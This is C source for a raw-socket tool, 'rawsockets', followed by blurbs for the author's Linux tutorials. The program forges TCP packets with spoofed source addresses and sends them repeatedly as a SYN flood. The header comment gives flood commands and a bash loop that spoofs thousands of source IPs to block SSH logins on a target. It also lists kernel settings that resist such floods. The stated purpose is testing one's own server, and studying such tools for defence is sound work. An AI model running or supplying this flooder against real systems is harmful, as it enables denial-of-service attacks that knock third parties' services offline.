/* Copyright GPL 2003 by Mike Chirico <mchirico@users.sourceforge.net>
How to use this program.
You must run this program as root, since it generates raw sockets. The
following example does a ping SYN flood against 192.168.1.71 2000000 time
on port 80.
$./rawsockets -s 192.168.1.155 -d 192.168.1.71 -n 2000000 -p 80
How do you prevent against such an attack? See the following article:
http://souptonuts.sourceforge.net/tcpdump_tutorial.html
References:
$ man packet
http://www.infosecwriters.com/text_resources/pdf/raw_tcp.pdf
http://www.linuxjournal.com/article/4659
http://www.cs.huji.ac.il/labs/danss/planetlab/SafeRawSockets.pdf
http://www.securityfocus.com/infocus/1729
http://post.doit.wisc.edu/linux/secure.html
http://staff.washington.edu/dittrich/misc/ddos/
http://www.ibr.cs.tu-bs.de/lehre/ws0405/sec/uebung/uebung4.pdf
ftp://rtfm.mit.edu/pub/usenet-by-group/comp.unix.programmer/Raw_IP_Networking_FAQ
##### Begin DoS Prevention #####
# shut some DoS stuff down
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
echo 1 > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
# increase the local port range
echo 1024 65535 > /proc/sys/net/ipv4/ip_local_port_range
# increase the SYN backlog queue
echo 2048 > /proc/sys/net/ipv4/tcp_max_syn_backlog
echo 0 > /proc/sys/net/ipv4/tcp_sack
echo 0 > /proc/sys/net/ipv4/tcp_timestamps
echo 64000 > /proc/sys/fs/file-max
ulimit -n 64000
Run the following on a client to test a server against DOS. Below the following
works against port 22. You will not be able to login.
#!/bin/bash
for j in `seq 254`
do
for i in `seq 256`
do
./rawsockets -s "192.168.$j.$i" -d 192.168.1.71 -p 22 -n 1
done
done
While the above is running issue the following command on the server.
$ echo 1 > /proc/sys/net/ipv4/tcp_syncookies
Also take a look at the number of half-open connections.
$ netstat -n -t|grep 'SYN_RECV'
If you want to set the SackOK
$ ./rawsockets -s 192.168.1.81 -d 192.168.1.71 -p 80 -n 1 -w 4 -x 2
Or if you want to set SackOK and mss to 1460
$ ./rawsockets -s 192.168.1.81 -d 192.168.1.71 -p 80 -n 1 -w 4 -x 2 -y 2 -z 4 -g 5 -h 180
References for TCP options:
http://www.packetshack.org/index.php?page=decode_tcp_opt
*/
#define __USE_BSD
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
struct tcp_options
{
u_int8_t op0;
u_int8_t op1;
u_int8_t op2;
u_int8_t op3;
u_int8_t op4;
u_int8_t op5;
u_int8_t op6;
u_int8_t op7;
};
char datagram[4096]; /* datagram buffer */
char pheader[1024]; /* pseudoheader buffer for computing tcp checksum */
uint16_t csum (uint16_t * addr, int len)
{
int nleft = len;
uint32_t sum = 0;
uint16_t *w = addr;
uint16_t answer = 0;
while( nleft > 1 ) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(unsigned char *) (&answer) = *(unsigned char *) w;
sum += answer;
}
sum = (sum >> 16)+(sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
int main(int argc, char **argv)
{
int flags = 0, c, numtries=90;
char src_ip[17];
char dst_ip[17];
short dst_port=80;
short th_sport=1234;
short tcp_flags=TH_SYN;
short pig_ack=0;
struct ip *iph = (struct ip *) datagram;
struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
struct tcp_options *tcpopt = (struct tcp_options *) (datagram + sizeof(struct ip) + sizeof(struct tcphdr));
struct sockaddr_in servaddr;
memset(datagram, 0, 4096); /* zero out the buffer */
fprintf(stderr,"sizeof (struct ip)= %d\n",sizeof(struct ip));
snprintf(src_ip,16,"%s","192.168.8.12"); //default
while ((c = getopt(argc, argv, "s:d:n:p:f:a:q:w:x:y:z:g:h:i:j:")) != -1) {
switch (c) {
case 's':
flags |= 0x1;
snprintf(src_ip,16,"%s",optarg);
break;
case 'd':
flags |= 0x2;
snprintf(dst_ip,16,"%s",optarg);
break;
case 'n':
flags |= 0x4;
numtries=atoi(optarg);
break;
case 'p':
flags |= 0x8;
dst_port=atoi(optarg);
break;
case 'f':
tcp_flags=atoi(optarg);
break;
case 'a':
pig_ack=atoi(optarg);
break;
case 'q':
th_sport=atoi(optarg);
break;
case 'w':
tcpopt->op0=atoi(optarg);
break;
case 'x':
tcpopt->op1=atoi(optarg);
break;
case 'y':
tcpopt->op2=atoi(optarg);
break;
case 'z':
tcpopt->op3=atoi(optarg);
break;
case 'g':
tcpopt->op4=atoi(optarg);
break;
case 'h':
tcpopt->op5=atoi(optarg);
break;
case 'i':
tcpopt->op6=atoi(optarg);
break;
case 'j':
tcpopt->op7=atoi(optarg);
break;
case '?':
flags |= 0x10;
fprintf(stderr, "Unrecognized option \n");
break;
}
}
if(! ( flags & 0x2 ) ) {
fprintf(stderr,"\nrawsockets -s <source ip> -d <destination ip> -p <port> -n <number of SYN floods>\n");
fprintf(stderr,"\nYou must give me a destination\n");
fprintf(stderr," Example:\n\t\t./rawsockets -s 192.168.1.81 -d 192.168.1.71 -p 80 -n 1\n");
fprintf(stderr," Or with SackOK :\n\t\t./rawsockets -s 192.168.1.81 -d 192.168.1.71 -p 80 -n 1 -w 4 -x 2\n");
fprintf(stderr," SackOK and mss 1460:\n\t\t./rawsockets -s 192.168.1.81 -d 192.168.1.71 -p 80 -n 1 -w 4 -x 2 -y 2 -z 4 -g 5 -h 180\n");
return 1;
}
if(getuid( )){
fprintf(stderr,"\n Also, you must be root to run this program: ./su -c \"./rawsockets -s <source ip> -d <destination ip> -p 80 -n 2000\"\n");
return 1;
}
fprintf(stdout,"src %s dst %s number of tries %d\n",src_ip,dst_ip,numtries);
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP); /* open raw socket */
servaddr.sin_family = AF_INET;
// servaddr.sin_port = htons (10000);
//OLD WAY servaddr.sin_addr.s_addr = inet_addr (dst_ip); /* destination ip */
inet_pton(AF_INET, dst_ip,&servaddr.sin_addr);
int tcphdr_size = sizeof(struct tcphdr);
iph->ip_hl = 5;
iph->ip_v = 4;
iph->ip_tos = 0;
iph->ip_len = sizeof (struct ip) + sizeof (struct tcphdr) + 8 +6 +6; /* data size = 0, but tcp using option flags */
iph->ip_id = htons (31337);
iph->ip_off = 0;
iph->ip_ttl = 250;
iph->ip_p = 6;
iph->ip_sum = 0;
//OLD WAY iph->ip_src.s_addr = inet_addr (src_ip);/* source ip */
inet_pton(AF_INET, src_ip, &(iph->ip_src));
iph->ip_dst.s_addr = servaddr.sin_addr.s_addr;
tcph->th_sport = htons (th_sport); /* source port */
tcph->th_dport = htons (dst_port); /* destination port */
tcph->th_seq = htonl(31337);
tcph->th_ack = htonl(pig_ack);/* in first SYN packet, ACK is not present */
tcph->th_x2 = 0;
// tcph->th_off = sizeof(struct tcphdr)/4; /* data position in the packet */
// Special chirico adjustment to give 2x32
tcph->th_off = 7+2+1 ;
fprintf(stderr,"Data offset %d sizeof(struct tcphdr)=%d\n",tcph->th_off,sizeof(struct tcphdr));
/*
# define TH_FIN 0x01
# define TH_SYN 0x02
# define TH_RST 0x04
# define TH_PUSH 0x08
# define TH_ACK 0x10
# define TH_URG 0x20
*/
tcph->th_flags = tcp_flags; /* initial connection request */
tcph->th_win = htons (57344); /* FreeBSD uses this value too */
tcph->th_sum = 0; /* we will compute it later */
tcph->th_urp = 0;
if (tcphdr_size % 4 != 0) /* takes care of padding to 32 bits */
tcphdr_size = ((tcphdr_size % 4) + 1) * 4;
fprintf(stderr,"tcphdr_size %d\n",tcphdr_size);
tcphdr_size=40;
fprintf(stderr,"tcphdr_size %d\n",tcphdr_size);
memset(pheader,0x0,sizeof(pheader));
memcpy(&pheader,&(iph->ip_src.s_addr),4);
memcpy(&pheader[4],&(iph->ip_dst.s_addr),4);
pheader[8]=0; // just to underline this zero byte specified by rfc
pheader[9]=(u_int16_t)iph->ip_p;
pheader[10]=(u_int16_t)(tcphdr_size & 0xFF00)>>8;
pheader[11]=(u_int16_t)(tcphdr_size & 0x00FF);
/* tcpopt->op0=4; sackOK
tcpopt->op1=2;
*/
memcpy(&pheader[12], tcph, sizeof(struct tcphdr));
memcpy(&pheader[12+ sizeof(struct tcphdr)], tcpopt, sizeof(struct tcp_options));
fprintf(stderr,"12+sizeof(struct tcphdr)= %d %d\n",12+sizeof(struct tcphdr),sizeof(struct tcp_options));
/* This is an example of setting SackOK we need to set it in the
header for checksum and in the actual data. This should only get
sent when using SYN? */
//pheader[32]=4;
// pheader[33]=2;
//datagram[40]=4;
//datagram[41]=2;
fprintf(stderr,"********** %d %d\n",tcpopt->op0,datagram[40]);
fprintf(stderr,"********** %d %d\n",tcpopt->op1,datagram[41]);
fprintf(stderr,"csum size is %d\n",tcphdr_size+12);
tcph->th_sum = csum ((uint16_t *) (pheader),tcphdr_size+12);
// iph->ip_sum = csum ((unsigned short *) datagram, iph->ip_len >> 1);
int one = 1;
const int *val = &one;
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0){
fprintf(stderr,"Error: setsockopt. You need to run this program as root\n");
return -1;
}
int modval= numtries / 15;
if (modval < 2) modval = 2;
int ft=0;
while(numtries-- > 0)
{
if (sendto (s,datagram,iph->ip_len ,0,(struct sockaddr *) &servaddr, sizeof (servaddr)) < 0)
{
fprintf(stderr,"Error in sendto\n");
exit(1);
} else {
if(ft==0) {
fprintf(stderr,"[****************]\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b");
ft=1;
}
if ( (numtries % modval) == 0 )
fprintf(stderr,".");
}
}
fprintf(stderr,"sizeof(struct tcp_options)=%d\n",sizeof(struct tcp_options));
return 0;
}
Linux System Admin Tips: There are over 190 Linux tips and tricks in this article. That is over 100 pages covering everything from NTP, setting up 2 IP address on one NIC, sharing directories among several users, putting running jobs in the background, find out who is doing what on your system by examining open sockets and the ps command, how to watch a file, how to prevent even root from deleting a file, tape commands, setting up cron jobs, using rsync, using screen conveniently with emacs, how to kill every process for a user, security tips and a lot more. These tip grow weekly. The above link will download the text version for easy grep searching.
Breaking Firewalls with OpenSSH and PuTTY: If the system administrator deliberately filters out all traffic except port 22 (ssh), to a single server, it is very likely that you can still gain access other computers behind the firewall. This article shows how remote Linux and Windows users can gain access to firewalled samba, mail, and http servers. In essence, it shows how openSSH and Putty can be used as a VPN solution for your home or workplace.
MySQL Tips and Tricks: Find out who is doing what in MySQL and how to kill the process, create binary log files, connect, create and select with Perl and Java, remove duplicates in a table with the index command, rollback and how to apply, merging several tables into one, updating foreign keys, monitor port 3306 with the tcpdump command, creating a C API, complex selects, and much more.
Create a Live Linux CD - BusyBox and OpenSSH Included: These steps will show you how to create a functioning Linux system, with the latest 2.6 kernel compiled from source, and how to integrate the BusyBox utilities including the installation of DHCP. Plus, how to compile in the OpenSSH package on this CD based system. On system boot-up a filesystem will be created and the contents from the CD will be uncompressed and completely loaded into RAM -- the CD could be removed at this point for boot-up on a second computer. The remaining functioning system will have full ssh capabilities. You can take over any PC assuming, of course, you have configured the kernel with the appropriate drivers and the PC can boot from a CD. This tutorial steps you through the whole processes.
SQLite Tutorial : This article explores the power and simplicity of sqlite3, first by starting with common commands and triggers, then the attach statement with the union operation is introduced in a way that allows multiple tables, in separate databases, to be combined as one virtual table, without the overhead of copying or moving data. Next, the simple sign function and the amazingly powerful trick of using this function in SQL select statements to solve complex queries with a single pass through the data is demonstrated, after making a brief mathematical case for how the sign function defines the absolute value and IF conditions.
The Lemon Parser Tutorial: This article explains how to build grammars and programs using the lemon parser, which is faster than yacc. And, unlike yacc, it is thread safe.
How to Compile the 2.6 kernel for Red Hat 9 and 8.0 and get Fedora Updates: This is a step by step tutorial on how to compile the 2.6 kernel from source.
Virtual Filesystem: Building A Linux Filesystem From An Ordinary File. You can take a disk file, format it as ext2, ext3, or reiser filesystem and then mount it, just like a physical drive. Yes, it then possible to read and write files to this newly mounted device. You can also copy the complete filesystem, since it is just a file, to another computer. If security is an issue, read on. This article will show you how to encrypt the filesystem, and mount it with ACL (Access Control Lists), which give you rights beyond the traditional read (r) write (w) and execute (x) for the 3 user groups file, owner and other.
Working With Time: What? There are 61 seconds in a minute? We can go back in time? We still tell time by the sun?
Mike Chirico, a father of triplets (all girls) lives outside of
Philadelphia, PA, USA. He has worked with Linux since 1996, has a Masters
in Computer Science and Mathematics from Villanova University, and has
worked in computer-related jobs from Wall Street to the University of
Pennsylvania. His hero is Paul Erdos, a brilliant number theorist who was
known for his open collaboration with others.
Mike's notes page is souptonuts. For
open source consulting needs, please send an email to
mchirico@comcast.net. All consulting work must include a donation to
SourceForge.net.
